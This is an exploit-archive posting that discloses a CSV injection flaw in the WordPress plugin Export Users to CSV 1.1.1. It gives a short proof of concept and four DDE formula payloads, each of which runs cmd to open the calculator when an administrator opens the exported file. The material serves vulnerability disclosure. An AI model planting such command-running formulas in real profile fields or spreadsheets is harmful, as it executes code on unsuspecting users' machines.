exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Export Users To CSV 1.1.1 CSV Injection

WordPress Export Users To CSV 1.1.1 CSV Injection
Posted Aug 16, 2018
Authored by Javier Olmedo

WordPress Export Users to CSV plugin version 1.1.1 suffers from a CSV injection vulnerability.

tags | exploit
SHA-256 | b300b31e2bd3c5ffcd8e03ac88eda85de9048362ed027cc29e08a93f254916ef

WordPress Export Users To CSV 1.1.1 CSV Injection

Change Mirror Download
# Exploit Title: Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-08-14
# Google Dork: N/A
# Vendor: Matt Cromwell
# Software Link: https://wordpress.org/plugins/export-users-to-csv/
# Affected Version: 1.1.1 and before
# Active installations: +20,000
# Patched Version: unpatched
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64

# 1. Plugin Description:
# WordPress Export Users to CSV plugin exports user data and meta data.
# You can even export the users by role and registration date range.

# 2. Technical Description:
# WordPress Export users to CSV plugin version 1.1.1. and before are affected by Remote Code Execution
# through the CSV injection vulnerability. This allows an application user to inject commands as part
# of the fields of his profile and these commands are executed when a user with greater privilege
# exports the data in CSV and opens that file on his machine.

# 3. Proof Of Concept (PoC):
# Enter the payload =SUM(1+1)*cmd|' /C calc'!A0 in any field of the profile, for example, in biography.
# When the user with high privileges logs in to the application, export data in CSV and opens the
# generated file, the command is executed and the calculator will run open on the machine.

# 4. Payloads:
=SUM(1+1)*cmd|' /C calc'!A0
+SUM(1+1)*cmd|' /C calc'!A0
-SUM(1+1)*cmd|' /C calc'!A0
@SUM(1+1)*cmd|' /C calc'!A0

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close